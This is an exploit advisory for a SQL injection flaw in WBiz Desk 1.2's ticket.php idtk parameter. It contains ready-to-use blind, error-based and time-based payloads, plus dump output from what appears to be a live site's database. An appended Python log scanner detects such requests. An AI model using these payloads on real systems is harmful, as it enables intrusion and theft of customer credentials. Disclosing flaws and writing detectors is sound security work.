WBiz Desk 1.2 SQL Injection
WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : https://www.codester.com/items/5641/
Vendor    : WeBiz Digital
Software  : WBiz Desk 1.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
=============

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /ticket.php

http://website/ticket.php?tk=1&idtk=[SQLi]&action=close

GET parameter 'idtk' is vulnerable to SQL Injection

---
Parameter: idtk (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close
---

[+] Starting the Attack

fetching current database
current database: 'wbizdesk_*****_com_br'

fetching tables
[12 tables]
+----------------+
| accounts       |
| category       |
| chat           |
| config         |
| customers      |
| departments    |
| email_template |
| log_tb         |
| messages       |
| tickets        |
| tutorial       |
| users          |
+----------------+

fetching columns for table 'customers'
[19 columns]
+--------------+-------------------+
| Column       | Type              |
+--------------+-------------------+
| name         | varchar(160)      |
| number       | varchar(11)       |
| status       | enum('S','B','N') |
| address      | varchar(255)      |
| city         | varchar(160)      |
| company      | varchar(160)      |
| country      | varchar(60)       |
| cpf_cnpj     | varchar(60)       |
| email        | varchar(255)      |
| id           | int(11)           |
| ip           | varchar(90)       |
| neighborhood | varchar(160)      |
| obs          | text              |
| os           | varchar(160)      |
| pass         | varchar(160)      |
| phrase       | varchar(160)      |
| salt         | varchar(255)      |
| state        | varchar(160)      |
| zipcode      | varchar(60)       |
+--------------+-------------------+

[-] Done
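
For operators of an affected install, an added detection example (not part of the advisory and not vendor code): it scans web server access logs for /ticket.php requests whose idtk value is not a plain integer. It assumes combined log format and that idtk is meant to be an integer ticket id; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3}')
# Assumption: a legitimate idtk is an integer ticket id.
NUMERIC_ID = re.compile(r"[0-9]{1,11}")

def suspicious_idtk(line):
    """Return (client, decoded idtk) when a /ticket.php request carries a
    non-integer idtk value; return None for everything else."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith("/ticket.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("idtk", []):
        # parse_qs decodes once; decode again so double-encoded input is caught.
        decoded = unquote(value)
        if not NUMERIC_ID.fullmatch(decoded):
            return client, decoded
    return None

def scan(lines):
    """Collect every suspicious (client, idtk) pair from an iterable of log lines."""
    return [hit for hit in map(suspicious_idtk, lines) if hit]

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2023:10:01:02 +0000] "GET /ticket.php?tk=1&idtk=42&action=close HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jun/2023:10:01:09 +0000] "GET /ticket.php?tk=1&idtk=1%27%20OR%20%271%27%3D%271&action=close HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Jun/2023:10:02:30 +0000] "GET /ticket.php?tk=1&idtk=1%2527&action=close HTTP/1.1" 500 0',
    '192.0.2.10 - - [12/Jun/2023:10:03:00 +0000] "GET /index.php?idtk=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} sent non-numeric idtk: {value!r}")
```

The same integer check belongs in the application itself, applied to idtk before it reaches any query, alongside parameterized statements.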